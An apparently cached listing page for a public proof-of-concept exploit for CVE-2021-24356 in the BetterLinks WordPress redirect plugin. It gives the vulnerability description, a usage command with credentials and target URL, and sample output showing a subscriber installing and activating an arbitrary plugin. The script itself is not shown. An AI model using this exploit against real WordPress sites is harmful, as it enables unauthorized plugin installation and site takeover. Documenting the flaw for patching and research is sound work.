CVE-2021-24356 PoC — BetterLinks WordPress plugin 访问控制错误漏洞

Source

https://github.com/RandomRobbieBF/CVE-2021-24356

Associated Vulnerability

Title:BetterLinks WordPress plugin 访问控制错误漏洞 (CVE-2021-24356)
Description:WordPress是WordPress（Wordpress）基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 BetterLinks WordPress plugin 2.0.4之前版本存在安全漏洞，该漏洞源于缺乏检查，攻击者可利用该漏洞激活任意插件安装。

Description

Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Subscriber + Arbitrary Plugin Installation

Readme

# CVE-2021-24356
Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Subscriber + Arbitrary Plugin Installation

# Description
A lack of capability checks and insufficient nonce check on the AJAX action in the plugin, made it possible for authenticated users to install arbitrary plugins on vulnerable sites. 

How to use
----

```
$ python3 CVE-2021-24356.py --url http://wordpress.lan --username user --password useruser1 --slug betterlinks
Getting REST API Nonce!
Nonce Found: dd72f43027
Installing Plugin!
{"success":true,"data":"Plugin is installed successfully!"}
Activating Plugin!
{"success":true,"data":"BetterLinks is activated!"}
```

Note: Some plugins might not activate if not you need to change sluga variable to the path/file.php that is the main file for the plugin currently works really well when the slug is something like betterlinks and the main file of the plugin is called betterlinks.php

File Snapshot


 [4.0K]  /data/pocs/f18da6924b55bb6ecfb9b4a819fcc0c760dd6496
├── [3.3K]  CVE-2021-24356.py
├── [ 34K]  LICENSE
└── [ 917]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!